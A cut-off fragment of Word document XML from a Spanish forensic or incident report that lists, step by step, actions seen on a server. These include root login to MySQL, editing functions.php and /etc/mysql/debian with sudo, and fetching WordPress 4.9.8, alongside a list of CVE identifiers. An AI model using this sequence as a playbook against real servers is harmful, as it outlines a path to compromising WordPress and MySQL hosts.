        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B31C536" w14:textId="74982916" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Busca paquete del servidor </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y con php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67A7B2" w14:textId="15B72EA8" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intenta conectarse como </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>root: En sistemas Unix y Linux, el usuario con acceso total al sistema.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Cabe destacar que esto no es una práctica normal de un administrador entrar como </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069933E8" w14:textId="3011E005" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Introduce los caracteres #1546501785.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68EF66" w14:textId="4F80923E" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relativo a esto, cabe destacar que las </w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de registro de apparmor, marcan números muy parecidos a este código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4E4A9" w14:textId="016F73A7" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Realiza varias consultas, edita functions.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B5019B" w14:textId="4666DCC0" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vuelve a ejecutar </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B8BD3" w14:textId="5B97EB40" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Edita con </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/mysql/debian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFFE26F" w14:textId="26B2F60F" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instala </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9EB2CA" w14:textId="2DC2CD72" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Busca paquetes de </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que contengan la palabra php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763DC087" w14:textId="4335E20E" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">e trae un archivo de </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ord</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ress 4.9.8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0FF062" w14:textId="2F0DEDF4" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CVE (Common Vulnerabilities and Exposures): Lista de registros de información pública sobre vulnerabilidades de seguridad.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-2018-</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20147</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018-</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20148</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018-</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20149</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018-</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20150</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018-</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20151</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018-</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20152</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018-</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20151</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018-</w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085A477" w14:textId="696007B0" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Busca paquetes relacionados con MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.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307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720319EE" w14:textId="7D7C0D37" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
